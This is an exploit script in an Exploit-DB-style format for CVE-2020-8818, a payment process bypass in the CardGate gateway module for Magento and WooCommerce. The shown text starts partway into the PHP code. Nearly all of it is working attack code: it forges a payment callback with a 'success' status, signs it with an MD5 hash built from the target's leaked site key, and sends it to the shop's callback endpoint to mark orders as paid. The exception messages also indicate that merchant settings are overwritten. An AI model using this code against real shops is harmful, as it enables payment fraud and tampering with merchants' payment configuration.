# Exploit Title: Magento WooCommerce CardGate Payment Gateway 2.0.30 - Payment Process Bypass # Discovery Date: 2020-02-02 # Public Disclosure Date: 2020-02-22 # Exploit Author: GeekHack # Vendor Homepage: https://www.cardgate.com (www.curopayments.com) # Software Link: https://github.com/cardgate/magento2/releases/tag/v2.0.30 # Version: <= 2.0.30 # Tested on: Magento 2.3.4 + CardGate Payment Gateway Module 2.0.30 # CVE: CVE-2020-8818 $_REQUEST['testmode'], 'reference' => ORDER, 'transaction' => 'T' . str_pad(time(), 11, random_int(0, 9)), 'currency' => ORDER_CURRENCY, 'amount' => ORDER_AMOUNT * 100, 'status' => 'success', 'code' => 200, 'pt' => ORDER_PAYMENT_TYPE ]; $payload['hash'] = md5( (!empty($payload['testmode']) ? 'TEST' : '') . $payload['transaction'] . $payload['currency'] . $payload['amount'] . $payload['reference'] . $payload['code'] . $aConfigData['site_key'] ); $response = doRequest(TARGET . '/cardgate/payment/callback', $payload, 'GET'); if ($response == $payload['transaction'] . '.' . $payload['code']) { die($aConfigData['merchant'] . '.' . $aConfigData['site_id'] . '.200'); } else { throw new Exception("Unable to spoof order status, but merchant settings was updated successfully ($response)"); } } else { die($aConfigData['merchant'] . '.' . $aConfigData['site_id'] . '.200'); } } else { throw new Exception("It seems target is not vulnerable ($response)"); } } catch (\Exception $oException_) { die(htmlspecialchars($oException_->getMessage())); } }